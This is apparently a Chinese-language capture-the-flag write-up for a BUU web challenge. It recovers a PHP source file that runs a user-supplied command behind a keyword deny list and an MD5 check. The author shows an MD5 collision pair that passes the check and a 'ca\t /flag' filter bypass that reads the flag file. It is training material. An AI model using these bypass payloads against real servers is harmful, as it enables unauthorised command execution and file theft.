BUU 简单web

先看着这个img后面的可能是加密了

得到一串数字  3535352e706e67 转换着文本试试

看到图片的名字，了能等会有用。

有同样的方式解密反推index.php 先转换十六进制，再两次base64加密

 TmprMlpUWTBOalUzT0RKbE56QTJPRGN3  放到img里试试。

 

一串base64解密

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header(\'content-type:text/html;charset=utf-8\');
$cmd = $_GET[\'cmd\'];
if (!isset($_GET[\'img\']) || !isset($_GET[\'cmd\']))
header(\'Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=\');
$file = hex2bin(base64_decode(base64_decode($_GET[\'img\'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo \'<img src ="./ctf3.jpeg">\';
die("xixi～ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src=\'data:image/gif;base64," . $txt . "\'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST[\'a\'] !== (string)$_POST[\'b\'] && md5($_POST[\'a\']) === md5($_POST[\'b\'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}

?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

关键还是要md5加密绕过后可以相等，不会做了看别人的解法

 

if ((string)$_POST[\'a\'] !== (string)$_POST[\'b\'] && md5($_POST[\'a\']) === md5($_POST[\'b\']))

关键语句 用md5强绕过

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

再返回源代码里面注意到还有很多被正则替换的字符  放入抓包

用检查过滤后的ca\t%20/flag访问根目录，

得到flag